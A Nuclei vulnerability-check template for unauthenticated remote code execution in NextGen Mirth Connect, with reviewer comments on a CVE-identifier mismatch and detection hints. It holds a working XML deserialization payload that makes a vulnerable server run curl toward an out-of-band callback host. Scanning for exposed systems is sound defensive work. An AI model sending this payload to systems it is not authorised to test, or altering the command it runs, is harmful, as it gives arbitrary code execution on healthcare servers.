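# Nuclei HTTP template: checks NextGen Mirth Connect for unauthenticated
# remote code execution by reading the server version and then sending an
# XML payload that triggers an out-of-band callback.
#
# NOTE(review): the first reference below is Horizon3's write-up, filed under
# CVE-2023-43208 in its URL, while this template is identified as
# CVE-2023-37679. The fixed version in the description (4.4.1) is the same
# cutoff the matcher uses. Confirm which identifier this check should carry
# before using a hit for patch-status triage.
id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  remediation: |
    Upgrade Mirth Connect to version 4.4.1 or later. Until the upgrade is in place, limit access to the administrator API (/api/*) to trusted networks.
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.00283
    epss-percentile: 0.65055
    # NOTE(review): the CPE pins 4.3.0 only, whereas the matcher accepts any
    # version below 4.4.1.
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    # Two requests are sent per target (version read, then payload).
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query: title:"mirth connect administrator"
  tags: cve,cve2023,nextgen,rce

http:
  - raw:
      # Request 1: unauthenticated read of the server version. The response
      # body feeds the `version` extractor below.
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI

      # Request 2: active check, not a passive fingerprint. The XML body
      # describes a dynamic proxy whose java.beans.EventHandler calls start()
      # on a java.lang.ProcessBuilder, so a vulnerable server spawns `curl`
      # toward the interactsh callback host. A hit means a process ran on the
      # target.
      # Detection side: an unauthenticated POST to /api/users with an
      # application/xml body naming java.beans.EventHandler or
      # java.lang.ProcessBuilder is what this probe looks like in proxy, WAF
      # and application logs.
      # The blank line after Content-Type separates headers from the body.
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
          <string>foo</string>
          <dynamic-proxy>
            <interface>java.lang.Comparable</interface>
            <handler class="java.beans.EventHandler">
              <target class="java.lang.ProcessBuilder">
                <command>
                  <string>curl</string>
                  <string>http://{{interactsh-url}}/</string>
                </command>
              </target>
              <action>start</action>
            </handler>
          </dynamic-proxy>
        </sorted-set>

    # All three expressions must hold (condition: and):
    #   1. the extracted version compares below 4.4.1;
    #   2. the callback host recorded a DNS interaction. The payload fetches
    #      an http:// URL, but only the name lookup is required, so targets
    #      that resolve names yet block outbound HTTP still match. Targets
    #      with no outbound DNS do not match even when the version is below
    #      4.4.1, so treat a non-match there as inconclusive;
    #   3. the version request returned 200 and the POST returned 500.
    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    # Captures the first response body into `version` for compare_versions;
    # internal: true keeps the value out of the reported results.
    # NOTE(review): '(.*)' accepts any text, including an empty match.
    # Presumably the endpoint returns a bare version string; confirm, or
    # anchor the pattern to a dotted version number.
    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# The digest below is the publisher's signature over the template as it was
# published. After any edit to this file it presumably no longer verifies;
# re-sign the template before relying on signature checks.
# digest: 4a0a004730450220639cf71c4a575fff6a9fed4cb3518fe8de8e77e7de1eeacab5cc6d256114c9c702210095b24e93bd2eed536233ec927f799c62afb4fb30aa15cc850ff1e2faff32290e:922c64590222798bb761d5b6d8e72950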